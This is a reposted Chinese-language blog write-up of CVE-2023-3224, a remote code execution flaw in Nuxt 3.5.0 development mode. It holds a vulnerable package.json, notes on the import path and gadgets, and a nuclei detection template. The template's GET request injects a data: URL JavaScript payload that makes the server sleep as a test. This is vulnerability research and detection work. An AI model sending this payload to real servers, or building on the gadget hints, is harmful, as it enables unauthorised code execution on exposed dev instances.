CVE-2023-3224 Nuxt dev mode rce
source link: https://y4er.com/posts/cve-2023-3224-nuxt-dev-mode-rce/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
CVE-2023-3224 Nuxt dev mode rce
https://nuxt.com/docs/examples/essentials/hello-world
照着这个创建文件,然后修改package.json里nuxt的版本号
{
"name": "example-hello-world",
"private": true,
"scripts": {
"build": "nuxi build",
"dev": "nuxi dev",
"start": "nuxi preview"
},
"devDependencies": {
"nuxt": "3.5.0"
}
}
https://github.com/nuxt/nuxt/commit/65a8f4eb3ef1b249a95fd59e323835a96428baff
如果服务器以dev模式运行并且请求的url以/__nuxt_component_test__/
开头,那么引入#build/test-component-wrapper.mjs
在#build/test-component-wrapper.mjs
中会截取query string然后import,造成rce。
当引入child_process执行命令时,报错500
这个时候需要用node_modules
里别的gadget。
编写模板时,要考虑怎么做验证,有的没办法执行命令,干脆用sleep延时来判断,然后发现nuxt在渲染时有缓存,如果两次payload一致时只会sleep一次,所以加了个随机数。
id: CVE-2023-3224
info:
name: nuxt developer mode RCE
author: Y4er
severity: critical
description: |
RCE in developer mode in nuxt/nuxt
reference:
- https://huntr.dev/bounties/1eb74fd8-0258-4c1f-a904-83b52e373a87/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.1
cve-id: CVE-2023-3224
cwe-id: CWE-94
tags: cve,cve2023,rce,http,vmware
http:
- method: GET
path:
- "{{BaseURL}}/__nuxt_component_test__/?path=data:text/javascript,await%20new%20Promise(resolve%20=%3E%20setTimeout(resolve,%206000));console.log('{{randstr}}')"
req-condition: true
matchers:
- type: dsl
dsl:
- 'duration>=5'
https://huntr.dev/bounties/1eb74fd8-0258-4c1f-a904-83b52e373a87/
文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK